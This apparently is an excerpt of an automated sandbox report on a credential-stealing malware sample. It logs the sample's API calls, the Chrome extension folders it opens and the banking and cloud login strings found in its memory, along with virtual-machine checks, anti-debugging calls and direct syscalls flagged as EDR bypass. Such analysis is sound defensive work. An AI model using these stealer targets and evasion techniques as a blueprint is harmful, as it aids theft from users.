Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	10_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	10_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C84261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	18_2_6C84261E

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Code function: 10_2_00401120 GetSystemInfo,ExitProcess,

10_2_00401120

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53139
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35354
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 42710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53064
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30041
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36977
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40701
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40213
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46137
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40346
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36239
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50326
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40697
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54691
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49715
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34826

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: zLwT7vCojz.exe, 00000000.00000002.1558401422.0000000004409000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2683790959.000002567684F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: zLwT7vCojz.exe, 00000000.00000002.1558401422.0000000004409000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: u48o.0.exe, 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: QEMU_HARDU
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: u48o.1.exe, 0000000E.00000003.1724220970.0000000000974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: zLwT7vCojz.exe, 00000000.00000002.1558592354.0000000005EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-79973
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-78930
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-78927
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-78948
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-78980
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-78941
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API call chain: ExitProcess graph end node	graph_10-78956
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_0096D15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

18_2_0096D15B

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

10_2_00416240

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04333C4E mov eax, dword ptr fs:[00000030h]	0_2_04333C4E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04320D90 mov eax, dword ptr fs:[00000030h]	0_2_04320D90
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432092B mov eax, dword ptr fs:[00000030h]	0_2_0432092B
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043AD1AB push dword ptr fs:[00000030h]	0_2_043AD1AB
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00415DC0 mov eax, dword ptr fs:[00000030h]	10_2_00415DC0
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_0040F124 mov eax, dword ptr fs:[00000030h]	13_2_0040F124

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_00420C1A GetProcessHeap,

0_2_00420C1A

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04329CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_04329CDA
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04329E6D SetUnhandledExceptionFilter,	0_2_04329E6D
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0432A125
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043309A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_043309A2
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00419DC7 SetUnhandledExceptionFilter,	10_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C22B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_6C22B66C
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C22B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6C22B1F7
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6C3DAC62
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0096C1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0096C1FD
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00976678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00976678
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C922782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_6C922782
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C9290E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_6C9290E9

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	NtQuerySystemInformation: Direct from: 0x456867	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	NtQuerySystemInformation: Direct from: 0x8F5BE4
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	NtQuerySystemInformation: Direct from: 0x6CEC2AB4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	NtSetInformationThread: Direct from: 0x6CD58C4C
